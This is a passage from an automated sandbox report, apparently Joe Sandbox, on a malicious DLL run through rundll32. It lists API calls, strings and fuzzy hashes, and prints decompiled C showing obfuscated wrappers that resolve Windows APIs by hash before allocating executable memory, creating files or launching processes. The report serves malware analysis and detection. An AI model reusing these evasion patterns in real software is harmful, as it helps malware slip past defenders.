GetSystemMetrics.USER32(00000000), ref: 00428471
GetSystemMetrics.USER32(00000001), ref: 0042847C

Strings

/}Au, xrefs: 00428471, 0042847C
GetMonitorInfoA, xrefs: 0042841C
DISPLAY, xrefs: 0042849D

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA

Uniqueness

Uniqueness Score: -1.00%

Function 004284D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00428545
GetSystemMetrics.USER32(00000001), ref: 00428550

Strings

GetMonitorInfoW, xrefs: 004284F0
/}Au, xrefs: 00428545, 00428550
DISPLAY, xrefs: 00428571

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004282E6
GetSystemMetrics.USER32(00000001), ref: 004282F8

Strings

MonitorFromPoint, xrefs: 004282AA
/}Au, xrefs: 004282E6, 004282F8

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004281C1
GetSystemMetrics.USER32(00000001), ref: 004281CD

Strings

/}Au, xrefs: 004281C1, 004281CD
MonitorFromRect, xrefs: 00428185

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00462B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
DdeGetLastError.USER32(00000015), ref: 00462BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00461428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF

Strings

`, xrefs: 00461498
0F, xrefs: 00461607

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0F$`
API String ID: 701148680-3237207667
Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 004280E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 00428110

Strings

/}Au, xrefs: 004280FD, 0042810A, 00428110
GetSystemMetrics, xrefs: 004280F8

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1836 Parent PID: 1468 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	269
Total number of Limit Nodes:	16

Executed Functions

Function 00243928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 002439C2
VirtualAlloc.KERNELBASE(00000000,00246CB4,00001000,00000040), ref: 00243A8E

Strings

|l$, xrefs: 00243961
trty55345, xrefs: 002439BD

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|l$
API String ID: 2643768156-3090529529
Opcode ID: 9f28c13a407c1da3b5c9853eb04274ac4199456088593c8cf187ed72515057d0
Instruction ID: e4df434c516121cae2bb9b60f6af0cc341c00a887e0c25a913a8723c29e5ccc1
Opcode Fuzzy Hash: 9f28c13a407c1da3b5c9853eb04274ac4199456088593c8cf187ed72515057d0
Instruction Fuzzy Hash: B261ACB86152019FD744DF28FDCEB1937A2F71B759B00801BE1898B271DB72A858CF06

Uniqueness

Uniqueness Score: -1.00%

Function 001F04C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001F04C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E001E7378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}

0x001f04cd
0x001f04d6
0x001f04dd
0x001f04e1
0x001f04e5
0x001f04ec
0x001f04f8
0x001f04fd
0x001f0502
0x001f0509
0x001f0510
0x001f0517
0x001f051f
0x001f0522
0x001f0529
0x001f0530
0x001f0537
0x001f0556
0x001f0560

APIs

ExitProcess.KERNEL32(00000000), ref: 001F0560

Strings

5l, xrefs: 001F0502
LZ, xrefs: 001F0529
*S, xrefs: 001F0522

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: *S$5l$LZ
API String ID: 621844428-1939029103
Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction ID: 71b2e8d95e87f6d86943710178c6f5d2b7b66f33c923484e077cede11ca94634
Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction Fuzzy Hash: EC11F771E0520CEBEB44DFE5D84AA9EBBB1EB50714F10C189E414A7284D7F96B548F41

Uniqueness

Uniqueness Score: -1.00%

Function 001E9B5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E001E9B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t52;
				void* _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				long _t81;

				_push(_a12);
				_t81 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001F2550(_t52);
				_v36 = 0x84647;
				asm("stosd");
				asm("stosd");
				_t70 = 0x14;
				asm("stosd");
				_v20 = 0xbd42;
				_t71 = 0x62;
				_v20 = _v20 / _t70;
				_v20 = _v20 ^ 0x00000265;
				_v16 = 0x7dd6;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x742f5ff0;
				_v16 = _v16 ^ 0x742f2524;
				_v12 = 0x61c8;
				_t72 = 0x48;
				_v12 = _v12 / _t72;
				_v12 = _v12 + 0xffff34fc;
				_v12 = _v12 ^ 0xffff6696;
				_v8 = 0xb2ad;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 * 0xd;
				_v8 = _v8 | 0x4443bccc;
				_v8 = _v8 ^ 0x475ff878;
				E001E7378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
				return _t68;
			}

0x001e9b66
0x001e9b69
0x001e9b6b
0x001e9b6e
0x001e9b71
0x001e9b73
0x001e9b78
0x001e9b87
0x001e9b8c
0x001e9b8d
0x001e9b90
0x001e9b91
0x001e9b9d
0x001e9b9e
0x001e9ba3
0x001e9baa
0x001e9bb8
0x001e9bbd
0x001e9bc4
0x001e9bcb
0x001e9bd5
0x001e9bdd
0x001e9be0
0x001e9be7
0x001e9bee
0x001e9c05
0x001e9c0c
0x001e9c0f
0x001e9c16
0x001e9c29
0x001e9c38
0x001e9c3f

APIs

RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 001E9C38

Strings

$%/t, xrefs: 001E9BC4

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: $%/t
API String ID: 1279760036-1978068534
Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
Instruction ID: 44e669c11b677933e7e0a908ec55e3b13a1b5f5b441dc5dcfdbe9aebe3a5d4e1
Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
Instruction Fuzzy Hash: AE214671D00209BBEB18CFA9C9469DEBBB5FB44310F108099E814AA2A0D7B99B109B51

Uniqueness

Uniqueness Score: -1.00%

Function 001FC0C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E001FC0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t40;
				void* _t48;
				long _t52;
				long _t53;

				_t52 = __edx;
				_push(0);
				_push(_a36);
				_t53 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F2550(_t40);
				_v20 = 0xb477;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x000000e5;
				_v16 = 0xb312;
				_v16 = _v16 + 0x2a6f;
				_v16 = _v16 ^ 0x0000d90b;
				_v12 = 0x5a0b;
				_v12 = _v12 + 0x400b;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x09a119a3;
				_v8 = 0x3388;
				_v8 = _v8 + 0x85f8;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x00415e39;
				E001E7378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
				return _t48;
			}

0x001fc0d3
0x001fc0d5
0x001fc0d6
0x001fc0d9
0x001fc0db
0x001fc0de
0x001fc0df
0x001fc0e2
0x001fc0e5
0x001fc0e8
0x001fc0eb
0x001fc0ee
0x001fc0f1
0x001fc0f2
0x001fc0f3
0x001fc0f8
0x001fc102
0x001fc106
0x001fc10d
0x001fc114
0x001fc11b
0x001fc122
0x001fc129
0x001fc130
0x001fc134
0x001fc13b
0x001fc142
0x001fc15d
0x001fc160
0x001fc174
0x001fc189
0x001fc191

APIs

CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 001FC189

Strings

9^A, xrefs: 001FC160

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: 9^A
API String ID: 823142352-4044883665
Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
Instruction ID: d75fc1eb6bbaa08bce8c01ebb77799ccf35509bfe04662d87ae9d5a5fecf451b
Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
Instruction Fuzzy Hash: 5B21C2B290020CBFEF019F95DD498DEBBB9FB55358F108198FA2462250D7B69E249B90

Uniqueness

Uniqueness Score: -1.00%

Function 00241638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00241686

Strings

Link, xrefs: 00241666

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: 2e7fc02205928d97bbedde9781b9ed6fd7165723cfed29fd064b8e84ef92a2af
Instruction ID: 56ca63ba7fb066cdbb1cfa369d04806597384c8ea9969a19eb0e163a7ce69f22
Opcode Fuzzy Hash: 2e7fc02205928d97bbedde9781b9ed6fd7165723cfed29fd064b8e84ef92a2af
Instruction Fuzzy Hash: DA11C170610B80ABC714EF75CD82A5E77E8AF55B00B811824F400DBA91EB31AA608B44

Uniqueness

Uniqueness Score: -1.00%

Function 0017EB40, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0017EB8F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 0017EDD9

Memory Dump Source

Source File: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: a73c7f45ac6bc14cca4c19e278ed6c8aa1560cdfae551ce054b080af31cead53
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 09C18775A002099FCB48CF98C590EAEB7F6BF8C314F14C199E919AB355D735EA42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00241A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 00241AC8: DdeFreeStringHandle.USER32(?,?), ref: 00241AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 00241A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00241A95

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 8b8cc3c04baf6ea7f34d794589e3ee27aa9d7814e091dd4f7d12d26324deab3f
Instruction ID: 57159df5937b29dae93bcc9f362f6893c19a5345a0d40bcfaf549a932a4da0a4
Opcode Fuzzy Hash: 8b8cc3c04baf6ea7f34d794589e3ee27aa9d7814e091dd4f7d12d26324deab3f
Instruction Fuzzy Hash: 1A115E31721A946BDB15EFA5C882A4E37ACAF59B00B5105A0FE009B286EB70ED508794

Uniqueness

Uniqueness Score: -1.00%

Function 001E7F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E001E7F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F2550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E001E7378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}

0x001e7f52
0x001e7f55
0x001e7f57
0x001e7f5a
0x001e7f5e
0x001e7f5f
0x001e7f64
0x001e7f6b
0x001e7f72
0x001e7f79
0x001e7f94
0x001e7f97
0x001e7f9e
0x001e7fa5
0x001e7fac
0x001e7fb3
0x001e7fba
0x001e7fbe
0x001e7fc5
0x001e7fcc
0x001e7fd3
0x001e7fd7
0x001e7feb
0x001e7ff7
0x001e7ffd

APIs

lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 001E7FF7

Strings

ZHq, xrefs: 001E7F6B

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: ZHq
API String ID: 1586166983-2177431251
Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction ID: 6e165abfb06a83004fec7c81b81b2b3ca3df62b13579c1e4eeb5b79c1b30c444
Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction Fuzzy Hash: 3311DFB6C01219ABDF01DFA4C94A8EEBFB4FF04318F108588E92466251D3B95B15DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0017E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0017E6A4

Strings

VirtualAlloc, xrefs: 0017E689, 0017E68C

Memory Dump Source

Source File: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_160000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: f7cc3df3f39c03c6aed70fbe99ce68bb1a8f8c96d5d5c7834556330e9890c4ee
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: AB113060D08289DAEF01D7E884097FEBFF55B25708F044098E5486B282D3BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Function 001FB86E, Relevance: 1.6, APIs: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E001FB86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F2550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E001E7378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}

0x001fb876
0x001fb87b
0x001fb87d
0x001fb87e
0x001fb881
0x001fb884
0x001fb887
0x001fb88a
0x001fb88d
0x001fb890
0x001fb891
0x001fb892
0x001fb893
0x001fb896
0x001fb897
0x001fb89a
0x001fb89d
0x001fb8a0
0x001fb8a4
0x001fb8a5
0x001fb8aa
0x001fb8bb
0x001fb8c3
0x001fb8c6
0x001fb8ca
0x001fb8d1
0x001fb8d8
0x001fb8df
0x001fb8e6
0x001fb8ed
0x001fb8f1
0x001fb8f4
0x001fb8fb
0x001fb902
0x001fb909
0x001fb928
0x001fb942
0x001fb949

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 001FB942

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction ID: c9befc111378de69bc4813641d607c9a3cf312e876fc77f9934da07b98032280
Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction Fuzzy Hash: CB21E472800248BBEF159F95CC09CDFBFB9FF89714F008148FA1466260D7B69A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E471A, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001E471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E001F2550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E001E7378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}

0x001e473b
0x001e4740
0x001e474a
0x001e4753
0x001e475a
0x001e4761
0x001e4765
0x001e476f
0x001e4772
0x001e4775
